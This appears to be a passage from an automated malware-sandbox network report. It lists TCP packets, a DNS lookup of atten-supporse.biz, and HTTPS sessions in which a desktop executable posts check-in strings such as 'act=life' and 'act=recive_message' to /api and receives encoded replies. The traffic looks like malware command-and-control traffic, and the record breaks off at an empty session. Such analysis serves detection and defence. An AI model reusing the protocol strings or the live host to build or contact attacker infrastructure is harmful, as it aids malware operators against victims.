Dec 9, 2024 22:35:12.055457115 CET	49708	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:12.055746078 CET	49708	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:12.055763006 CET	443	49708	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:12.176628113 CET	49707	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:12.176649094 CET	443	49707	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:13.269382000 CET	443	49708	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:13.269459963 CET	49708	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:13.271078110 CET	49708	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:13.271090031 CET	443	49708	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:13.271326065 CET	443	49708	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:13.272392035 CET	49708	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:13.272506952 CET	49708	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:13.272540092 CET	443	49708	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:13.272622108 CET	49708	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:13.272631884 CET	443	49708	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:14.562258005 CET	443	49708	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:14.562370062 CET	443	49708	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:14.562529087 CET	49708	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:14.562665939 CET	49708	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:14.562676907 CET	443	49708	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:14.898574114 CET	49709	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:14.898616076 CET	443	49709	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:14.898685932 CET	49709	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:14.899059057 CET	49709	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:14.899070978 CET	443	49709	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:16.110248089 CET	443	49709	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:16.110444069 CET	49709	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:16.111900091 CET	49709	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:16.111910105 CET	443	49709	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:16.112139940 CET	443	49709	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:16.113540888 CET	49709	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:16.113651991 CET	49709	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:16.113657951 CET	443	49709	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:16.855899096 CET	443	49709	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:16.855988979 CET	443	49709	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:16.856174946 CET	49709	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:16.856198072 CET	49709	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:17.754496098 CET	49713	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:17.754532099 CET	443	49713	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:17.754796028 CET	49713	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:17.755553007 CET	49713	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:17.755569935 CET	443	49713	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:18.974591970 CET	443	49713	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:18.974675894 CET	49713	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:18.976140022 CET	49713	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:18.976147890 CET	443	49713	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:18.976392031 CET	443	49713	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:18.984560966 CET	49713	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:18.985416889 CET	49713	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:18.985452890 CET	443	49713	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:18.985635996 CET	49713	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:18.985673904 CET	443	49713	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:18.985804081 CET	49713	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:18.985845089 CET	443	49713	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:18.985970020 CET	49713	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:18.986005068 CET	443	49713	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:18.986164093 CET	49713	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:18.986197948 CET	443	49713	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:18.986380100 CET	49713	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:18.986414909 CET	443	49713	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:18.986423016 CET	49713	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:18.986428976 CET	443	49713	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:18.986558914 CET	49713	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:18.986583948 CET	443	49713	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:18.986612082 CET	49713	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:18.987013102 CET	49713	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:18.987051010 CET	49713	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:19.031332970 CET	443	49713	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:19.034354925 CET	49713	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:19.034388065 CET	443	49713	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:19.034408092 CET	49713	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:19.034420013 CET	443	49713	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:19.034440041 CET	49713	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:19.034452915 CET	443	49713	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:19.034513950 CET	49713	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:19.034528017 CET	443	49713	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:23.114389896 CET	443	49713	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:23.114495039 CET	443	49713	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:23.114564896 CET	49713	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:23.114801884 CET	49713	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:23.114818096 CET	443	49713	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:23.153253078 CET	49722	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:23.153296947 CET	443	49722	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:23.153403044 CET	49722	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:23.153778076 CET	49722	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:23.153790951 CET	443	49722	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:23.317538023 CET	49722	443	192.168.2.5	104.21.48.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 9, 2024 22:34:59.339140892 CET	64160	53	192.168.2.5	1.1.1.1
Dec 9, 2024 22:34:59.640356064 CET	53	64160	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 9, 2024 22:34:59.339140892 CET	192.168.2.5	1.1.1.1	0x6ace	Standard query (0)	atten-supporse.biz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 9, 2024 22:34:59.640356064 CET	1.1.1.1	192.168.2.5	0x6ace	No error (0)	atten-supporse.biz	104.21.48.1	A (IP address)	IN (0x0001)	false
Dec 9, 2024 22:34:59.640356064 CET	1.1.1.1	192.168.2.5	0x6ace	No error (0)	atten-supporse.biz	104.21.16.1	A (IP address)	IN (0x0001)	false
Dec 9, 2024 22:34:59.640356064 CET	1.1.1.1	192.168.2.5	0x6ace	No error (0)	atten-supporse.biz	104.21.96.1	A (IP address)	IN (0x0001)	false
Dec 9, 2024 22:34:59.640356064 CET	1.1.1.1	192.168.2.5	0x6ace	No error (0)	atten-supporse.biz	104.21.80.1	A (IP address)	IN (0x0001)	false
Dec 9, 2024 22:34:59.640356064 CET	1.1.1.1	192.168.2.5	0x6ace	No error (0)	atten-supporse.biz	104.21.112.1	A (IP address)	IN (0x0001)	false
Dec 9, 2024 22:34:59.640356064 CET	1.1.1.1	192.168.2.5	0x6ace	No error (0)	atten-supporse.biz	104.21.64.1	A (IP address)	IN (0x0001)	false
Dec 9, 2024 22:34:59.640356064 CET	1.1.1.1	192.168.2.5	0x6ace	No error (0)	atten-supporse.biz	104.21.32.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

atten-supporse.biz

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	104.21.48.1	443	2876	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 21:35:00 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: atten-supporse.biz
2024-12-09 21:35:00 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-09 21:35:01 UTC	1015	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 21:35:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=5bqmn2oth4tkb85ut6k8efpr0u; expires=Fri, 04-Apr-2025 15:21:40 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HtxWJfxqtWaXQrck%2FSWf5nvnLMDxt4mN9UJbu%2B33nezSvRY0rW82es020YQ39XtNfRM4J9eNsin9FtWFPH5QgylvwRJGKapxYCpXIVFK%2FQlIyn8pfFZWAqmhe490aIBrBY6KEsA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ef81f60188443b0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1587&min_rtt=1577&rtt_var=613&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=909&delivery_rate=1755862&cwnd=32&unsent_bytes=0&cid=f1d864b52e8d80ba&ts=1066&x=0"
2024-12-09 21:35:01 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-09 21:35:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49705	104.21.48.1	443	2876	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 21:35:03 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 53 Host: atten-supporse.biz
2024-12-09 21:35:03 UTC	53	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
2024-12-09 21:35:04 UTC	1022	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 21:35:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=7qidgm5qsf7mk2c9ik6hrttvnm; expires=Fri, 04-Apr-2025 15:21:42 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0ONFrtvcgqdN8j4bGAp1ZMRS9e%2FjmU8C2B7aEYjT%2BeiLXRBFKqxmQYksJKzaCo%2BdyZuEBjWNtAQ1%2BEnV%2Fc7rThSZd9065gi2l9i6NacVzxyoxIT0DBg61Q5pfWBXAFL%2Fdky1wv0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ef81f6e99e37ced-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2038&min_rtt=1849&rtt_var=829&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=955&delivery_rate=1579232&cwnd=179&unsent_bytes=0&cid=fe09a6bfff3d0f11&ts=1377&x=0"
2024-12-09 21:35:04 UTC	347	IN	Data Raw: 34 39 31 63 0d 0a 6a 71 51 6d 77 51 75 4a 43 63 5a 6b 67 78 35 52 47 45 69 48 49 56 46 71 32 76 41 65 66 67 47 43 69 32 6c 55 4a 75 46 34 43 6f 66 31 68 6c 44 6a 4d 62 30 6c 35 42 66 6d 50 47 74 73 4f 76 4a 45 66 55 69 37 6c 44 78 45 5a 2b 50 6e 47 6a 45 4b 77 77 35 6e 70 62 54 43 52 36 31 34 37 43 58 6b 41 66 73 38 61 30 4d 7a 70 55 51 2f 53 4f 44 53 65 78 52 6a 34 2b 63 4c 4e 55 32 4f 43 47 62 6b 35 73 68 42 71 57 37 71 62 61 63 49 37 6e 73 30 66 53 6e 74 54 7a 67 48 73 70 30 38 55 69 50 6e 38 55 74 75 42 4b 77 64 66 75 62 44 78 56 57 71 4b 66 51 6c 76 55 62 6d 63 48 4d 69 61 75 5a 45 4d 77 61 38 6c 48 55 57 61 65 72 76 43 6a 42 4d 6b 52 46 73 37 2b 62 47 51 71 68 6b 34 33 6d 71 41 75 6c 77 4d 6e 63 70 70 51 31 7a 44 36 44 53 4a 46 77 77 30 75 6f 61 4a Data Ascii: 491cjqQmwQuJCcZkgx5RGEiHIVFq2vAefgGCi2lUJuF4Cof1hlDjMb0l5BfmPGtsOvJEfUi7lDxEZ+PnGjEKww5npbTCR6147CXkAfs8a0MzpUQ/SODSexRj4+cLNU2OCGbk5shBqW7qbacI7ns0fSntTzgHsp08UiPn8UtuBKwdfubDxVWqKfQlvUbmcHMiauZEMwa8lHUWaervCjBMkRFs7+bGQqhk43mqAulwMncppQ1zD6DSJFww0uoaJ
2024-12-09 21:35:04 UTC	1369	IN	Data Raw: 62 53 47 51 71 31 6f 35 6d 75 32 44 75 70 33 4e 6d 67 68 37 45 34 2b 43 4c 57 59 63 78 39 6a 35 2b 4d 42 4f 55 36 48 46 32 58 6a 37 4d 59 45 37 53 6e 73 63 2b 52 65 6f 56 38 32 61 69 33 70 56 58 45 79 2b 49 30 79 42 53 50 6e 35 55 74 75 42 49 73 66 61 2b 62 6e 79 55 65 72 59 76 6c 72 74 67 44 73 65 53 46 38 4c 2b 74 4a 4d 42 71 79 6e 48 6f 66 61 75 76 67 44 6a 46 41 77 31 51 6f 34 76 53 47 48 4f 4e 49 35 6d 43 6f 44 50 5a 38 63 32 56 6b 2f 41 4d 30 42 50 6a 4b 50 42 68 69 35 4f 67 50 4f 45 71 48 46 6d 37 72 34 63 6c 43 71 57 6e 73 59 61 77 4f 34 48 45 34 64 53 72 67 54 6a 63 4f 74 4a 4e 35 58 43 32 67 37 68 4e 32 48 4d 4d 30 62 2b 62 2b 68 48 47 67 5a 2b 56 73 73 6b 62 2b 4d 69 6f 36 4c 65 6b 44 61 30 69 32 6c 33 4d 4f 59 76 4c 73 42 53 52 49 68 68 78 6c Data Ascii: bSGQq1o5mu2Dup3Nmgh7E4+CLWYcx9j5+MBOU6HF2Xj7MYE7Snsc+ReoV82ai3pVXEy+I0yBSPn5UtuBIsfa+bnyUerYvlrtgDseSF8L+tJMBqynHofauvgDjFAw1Qo4vSGHONI5mCoDPZ8c2Vk/AM0BPjKPBhi5OgPOEqHFm7r4clCqWnsYawO4HE4dSrgTjcOtJN5XC2g7hN2HMM0b+b+hHGgZ+Vsskb+Mio6LekDa0i2l3MOYvLsBSRIhhxl
2024-12-09 21:35:04 UTC	1369	IN	Data Raw: 47 67 5a 2b 56 73 73 6b 62 2b 4d 69 6f 36 4c 65 6b 44 61 30 69 31 6d 6e 6b 5a 62 4f 48 6a 42 54 4e 4f 6a 78 4a 6d 35 76 37 4a 51 4b 4e 6c 34 32 47 70 43 4f 56 30 4f 6e 45 68 34 30 4d 79 41 76 6a 63 50 42 74 37 6f 4c 46 4c 41 6b 4f 50 46 32 65 6e 32 63 56 4b 72 57 37 39 4b 37 74 49 2b 44 77 30 64 6d 71 39 41 7a 38 42 75 4a 6c 32 47 47 50 6e 35 41 34 31 51 34 41 58 62 2b 2f 69 77 55 43 76 59 4f 5a 74 70 41 48 6c 65 53 46 2f 49 2b 6c 50 63 30 62 34 6c 57 52 63 4f 36 44 47 44 43 42 48 72 42 6c 35 37 4b 7a 5a 43 72 6f 70 37 47 66 6b 58 71 46 37 4e 6e 49 68 34 30 73 7a 47 72 32 63 64 78 31 70 35 75 67 47 4f 6b 4b 44 47 32 6a 6a 34 4d 5a 44 70 48 76 35 62 71 49 55 36 7a 78 39 4f 69 33 39 41 32 74 49 6a 6f 4a 72 44 58 57 69 33 41 67 34 53 6f 51 4d 4b 50 71 69 33 Data Ascii: GgZ+Vsskb+Mio6LekDa0i1mnkZbOHjBTNOjxJm5v7JQKNl42GpCOV0OnEh40MyAvjcPBt7oLFLAkOPF2en2cVKrW79K7tI+Dw0dmq9Az8BuJl2GGPn5A41Q4AXb+/iwUCvYOZtpAHleSF/I+lPc0b4lWRcO6DGDCBHrBl57KzZCrop7GfkXqF7NnIh40szGr2cdx1p5ugGOkKDG2jj4MZDpHv5bqIU6zx9Oi39A2tIjoJrDXWi3Ag4SoQMKPqi3
2024-12-09 21:35:04 UTC	1369	IN	Data Raw: 6b 59 62 59 4f 37 33 45 34 64 53 48 33 51 7a 34 4d 74 4a 5a 30 46 32 6d 67 70 30 73 78 58 4d 4e 43 4b 4e 44 68 79 55 53 67 66 36 74 30 36 68 2b 68 65 7a 38 36 63 71 56 50 50 51 69 33 6e 6e 41 58 61 2b 48 6c 42 54 46 42 69 68 4a 67 39 2b 33 43 54 4b 4a 6e 35 47 71 67 41 2b 52 34 4e 48 34 73 36 67 4e 39 53 4c 2b 4b 50 45 51 6a 7a 38 34 2b 64 47 57 35 57 6e 65 72 39 59 5a 44 72 79 6d 7a 4b 36 67 46 37 58 51 38 66 43 50 70 53 54 6f 44 74 4a 6c 34 45 47 72 6c 37 77 6f 7a 51 59 49 65 5a 4f 2f 71 78 55 65 73 5a 75 52 6a 35 45 69 68 65 79 73 36 63 71 56 6d 4a 41 4f 32 6c 44 77 44 4c 66 6d 70 44 44 6f 45 32 31 70 6b 37 4f 72 41 51 61 39 6f 37 57 4f 68 44 75 56 39 4e 58 77 70 36 6b 63 32 43 62 65 57 63 42 4a 70 34 65 67 48 50 55 75 49 48 79 69 72 72 4d 46 63 34 7a Data Ascii: kYbYO73E4dSH3Qz4MtJZ0F2mgp0sxXMNCKNDhyUSgf6t06h+hez86cqVPPQi3nnAXa+HlBTFBihJg9+3CTKJn5GqgA+R4NH4s6gN9SL+KPEQjz84+dGW5Wner9YZDrymzK6gF7XQ8fCPpSToDtJl4EGrl7wozQYIeZO/qxUesZuRj5Eiheys6cqVmJAO2lDwDLfmpDDoE21pk7OrAQa9o7WOhDuV9NXwp6kc2CbeWcBJp4egHPUuIHyirrMFc4z
2024-12-09 21:35:04 UTC	1369	IN	Data Raw: 43 75 5a 35 4f 48 55 6d 70 51 31 7a 44 36 44 53 4a 46 78 4e 36 2f 6f 63 4e 55 71 49 44 48 4f 6c 38 34 68 64 34 32 37 6e 4b 2f 78 47 34 6e 63 34 66 69 72 70 51 7a 63 46 75 49 42 7a 47 32 54 70 34 68 6b 38 51 34 51 52 59 4f 37 6a 77 46 61 76 5a 2f 6c 75 74 68 53 68 4d 6e 4e 39 4d 71 55 62 63 7a 36 2f 67 6d 77 66 49 64 48 2f 43 43 42 50 6a 68 59 6f 2b 71 4c 66 42 4b 52 6c 71 7a 50 6b 41 4f 35 31 4d 48 55 72 37 45 38 2b 44 62 47 58 66 52 70 6e 36 75 4d 4c 4d 45 4b 43 48 32 4c 6d 37 63 78 4e 70 47 48 73 61 4c 5a 47 72 7a 77 30 59 6d 71 39 41 78 6f 50 71 70 78 73 58 48 79 75 38 45 73 78 53 4d 4e 43 4b 4f 48 6d 79 55 43 6b 5a 65 31 75 6f 67 76 67 63 7a 4a 36 4a 65 46 49 4f 67 36 35 6e 33 6b 52 5a 2f 4c 6a 41 44 6c 49 69 68 5a 6c 70 61 4b 47 51 37 73 70 73 79 75 Data Ascii: CuZ5OHUmpQ1zD6DSJFxN6/ocNUqIDHOl84hd427nK/xG4nc4firpQzcFuIBzG2Tp4hk8Q4QRYO7jwFavZ/luthShMnN9MqUbcz6/gmwfIdH/CCBPjhYo+qLfBKRlqzPkAO51MHUr7E8+DbGXfRpn6uMLMEKCH2Lm7cxNpGHsaLZGrzw0Ymq9AxoPqpxsXHyu8EsxSMNCKOHmyUCkZe1uogvgczJ6JeFIOg65n3kRZ/LjADlIihZlpaKGQ7spsyu
2024-12-09 21:35:04 UTC	1369	IN	Data Raw: 44 35 77 4f 4f 39 49 4e 67 57 31 6e 33 38 61 5a 65 76 6c 47 54 39 45 67 42 45 6f 71 36 7a 42 58 4f 4d 78 71 30 69 7a 45 4f 74 37 50 32 77 68 35 45 41 6c 42 61 6a 53 4d 6c 78 79 35 2f 68 4c 62 6c 4b 54 44 57 2f 36 6f 74 38 45 70 47 57 72 4d 2b 51 41 36 48 6f 30 66 43 54 33 52 6a 55 48 74 35 74 31 47 47 76 6a 36 51 38 79 51 34 59 5a 5a 4f 37 72 78 55 75 6e 59 4f 56 69 71 30 61 76 50 44 52 69 61 72 30 44 45 68 4f 37 6e 6e 46 63 66 4b 37 77 53 7a 46 49 77 30 49 6f 36 65 4c 44 52 4b 6c 76 37 32 36 69 44 4f 52 38 4f 48 6b 6c 34 55 55 33 42 37 69 5a 64 52 31 6c 35 65 4d 41 4d 45 6d 41 48 47 36 6c 6f 6f 5a 44 75 79 6d 7a 4b 34 51 64 37 48 41 30 4f 6a 57 72 57 6e 4d 50 74 4e 49 6b 58 47 6a 73 37 51 77 32 53 59 41 53 62 65 48 6d 77 30 53 72 65 2b 4e 72 6f 78 54 7a Data Ascii: D5wOO9INgW1n38aZevlGT9EgBEoq6zBXOMxq0izEOt7P2wh5EAlBajSMlxy5/hLblKTDW/6ot8EpGWrM+QA6Ho0fCT3RjUHt5t1GGvj6Q8yQ4YZZO7rxUunYOViq0avPDRiar0DEhO7nnFcfK7wSzFIw0Io6eLDRKlv726iDOR8OHkl4UU3B7iZdR1l5eMAMEmAHG6looZDuymzK4Qd7HA0OjWrWnMPtNIkXGjs7Qw2SYASbeHmw0Sre+NroxTz
2024-12-09 21:35:04 UTC	1369	IN	Data Raw: 71 39 41 77 31 49 71 70 46 73 48 32 7a 78 31 30 74 75 58 62 31 61 59 2f 50 72 31 6b 65 31 59 75 5a 6e 74 54 69 68 4a 47 63 6f 65 4c 63 52 59 52 66 34 6a 55 4e 53 49 2b 47 70 55 77 39 64 77 77 77 6f 76 62 36 49 42 4c 45 70 73 79 76 6a 42 66 4e 75 4e 58 6b 38 35 67 51 4e 4e 70 2b 45 64 68 74 7a 35 2f 34 45 64 67 72 44 46 53 69 39 31 59 5a 4e 70 48 4c 36 66 61 6b 57 35 6a 77 4d 4e 47 72 39 41 32 74 49 6a 5a 46 79 45 6d 54 32 2b 45 59 52 55 6f 6b 64 65 4f 4c 37 79 51 54 74 4b 65 30 72 2f 46 57 76 50 44 64 72 61 72 30 54 59 56 50 74 77 53 74 4d 4d 66 2b 6e 45 6e 5a 53 77 30 49 36 71 36 7a 55 42 50 73 70 72 47 69 32 46 4f 64 2f 4a 58 6c 74 32 33 30 55 45 72 57 55 61 77 31 64 33 75 34 52 4f 30 4b 55 43 79 54 77 37 38 68 4b 70 48 2b 72 4a 65 51 4a 6f 53 51 4b 4f Data Ascii: q9Aw1IqpFsH2zx10tuXb1aY/Pr1ke1YuZntTihJGcoeLcRYRf4jUNSI+GpUw9dwwwovb6IBLEpsyvjBfNuNXk85gQNNp+Edhtz5/4EdgrDFSi91YZNpHL6fakW5jwMNGr9A2tIjZFyEmT2+EYRUokdeOL7yQTtKe0r/FWvPDdrar0TYVPtwStMMf+nEnZSw0I6q6zUBPsprGi2FOd/JXlt230UErWUaw1d3u4RO0KUCyTw78hKpH+rJeQJoSQKO
2024-12-09 21:35:04 UTC	1369	IN	Data Raw: 7a 55 4f 6a 41 4a 30 6b 77 74 37 6c 5a 4b 51 71 61 57 6e 36 6c 74 4a 51 4b 34 33 75 72 4d 2b 52 42 34 6d 34 68 66 43 6e 7a 51 48 51 32 68 72 56 79 47 32 4c 32 2b 52 77 35 65 72 30 50 61 2b 76 69 77 56 4b 79 4b 61 55 72 71 30 61 35 52 58 4d 79 61 74 6f 4e 63 78 44 34 79 6a 77 70 59 4f 37 6e 44 43 42 56 7a 6a 31 6d 34 75 33 51 56 4c 52 6d 71 79 58 6b 41 4b 45 6b 59 54 52 71 34 56 4a 7a 55 4f 6a 41 4a 30 6b 77 74 37 6c 5a 4b 51 71 61 57 6e 36 6c 74 4a 51 4b 34 33 75 72 4d 2b 52 42 34 6d 34 68 66 43 6e 7a 51 48 51 32 68 72 56 79 47 32 4c 32 2b 52 77 35 43 36 30 73 53 64 76 53 30 30 65 74 5a 2b 78 39 74 55 61 76 50 44 77 36 63 74 77 44 65 30 69 48 33 44 77 45 49 37 69 70 50 6a 56 4b 6a 52 31 2b 39 4b 48 68 53 71 52 6f 2f 58 75 7a 43 61 35 53 42 56 74 71 71 77 Data Ascii: zUOjAJ0kwt7lZKQqaWn6ltJQK43urM+RB4m4hfCnzQHQ2hrVyG2L2+Rw5er0Pa+viwVKyKaUrq0a5RXMyatoNcxD4yjwpYO7nDCBVzj1m4u3QVLRmqyXkAKEkYTRq4VJzUOjAJ0kwt7lZKQqaWn6ltJQK43urM+RB4m4hfCnzQHQ2hrVyG2L2+Rw5C60sSdvS00etZ+x9tUavPDw6ctwDe0iH3DwEI7ipPjVKjR1+9KHhSqRo/XuzCa5SBVtqqw
2024-12-09 21:35:04 UTC	1369	IN	Data Raw: 67 6e 73 69 58 63 33 37 44 43 5a 48 77 53 74 2b 35 75 7a 49 51 2b 4d 6e 71 33 50 6b 58 71 46 52 49 58 30 36 35 67 4e 39 53 4c 54 53 4a 46 78 75 38 75 34 62 4e 51 69 45 41 47 2b 6c 38 34 68 64 34 33 2b 72 4d 2f 64 49 6f 57 35 7a 49 6d 71 69 54 54 34 4a 75 35 78 2f 44 6e 48 6d 36 68 30 31 41 37 30 6b 52 66 66 72 31 6b 66 68 57 4f 5a 76 73 68 50 69 62 44 52 45 46 4d 68 52 4e 42 69 37 30 46 41 62 62 75 7a 58 4e 51 46 56 68 41 6f 71 77 2b 2f 51 52 2b 4d 6e 71 33 50 6b 58 71 46 52 49 58 30 36 35 67 45 66 44 37 57 65 50 41 4d 74 2b 61 6b 64 64 68 7a 51 56 43 6a 33 72 4a 34 45 35 47 72 35 65 61 49 46 39 33 39 30 52 42 54 49 55 54 51 59 75 39 42 4e 45 57 66 32 2f 41 67 6d 51 37 30 6b 52 66 66 72 31 6b 66 68 54 4e 45 70 6c 52 44 69 66 44 31 39 61 71 73 44 4b 30 6a Data Ascii: gnsiXc37DCZHwSt+5uzIQ+Mnq3PkXqFRIX065gN9SLTSJFxu8u4bNQiEAG+l84hd43+rM/dIoW5zImqiTT4Ju5x/DnHm6h01A70kRffr1kfhWOZvshPibDREFMhRNBi70FAbbuzXNQFVhAoqw+/QR+Mnq3PkXqFRIX065gEfD7WePAMt+akddhzQVCj3rJ4E5Gr5eaIF9390RBTIUTQYu9BNEWf2/AgmQ70kRffr1kfhTNEplRDifD19aqsDK0j

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49706	104.21.48.1	443	2876	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
